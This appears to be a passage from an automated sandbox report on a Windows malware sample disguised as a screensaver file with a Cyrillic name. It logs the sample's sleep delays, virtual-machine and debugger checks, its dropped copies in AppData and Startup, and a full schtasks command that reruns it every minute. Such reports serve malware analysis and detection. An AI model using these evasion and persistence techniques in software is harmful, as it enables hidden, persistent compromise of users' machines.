Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595637Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595516Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595406Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595297Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595187Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595078Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594969Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594860Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594735Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594610Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594485Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594360Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594235Jump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeWindow / User API: threadDelayed 1738Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeWindow / User API: threadDelayed 7970Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599891Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599781Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599672Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599547Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599406Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599297Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599188Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599063Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598937Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598828Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598719Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598605Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598485Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598373Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598259Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598141Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598030Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597922Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597813Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597688Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597563Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597438Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597327Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597219Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597094Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596984Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596875Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596765Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596656Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596547Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596438Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596313Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596203Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596094Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595969Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595860Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595746Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595637Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595516Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595406Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595297Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595187Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595078Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594969Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594860Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594735Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594610Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594485Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594360Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 594235Jump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: Amcache.hve.13.drBinary or memory string: VMware
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2720847952.000000000116D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.drBinary or memory string: vmci.sys
Source: Amcache.hve.13.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3240123404.000000001B580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: Amcache.hve.13.drBinary or memory string: VMware20,1
Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563

Anti Debugging

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144EE00 CheckRemoteDebuggerPresent,0_2_0144EE00
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeFile created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile created: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to dropped file
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /SJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeQueries volume information: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrQueries volume information: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrQueries volume information: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrQueries volume information: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

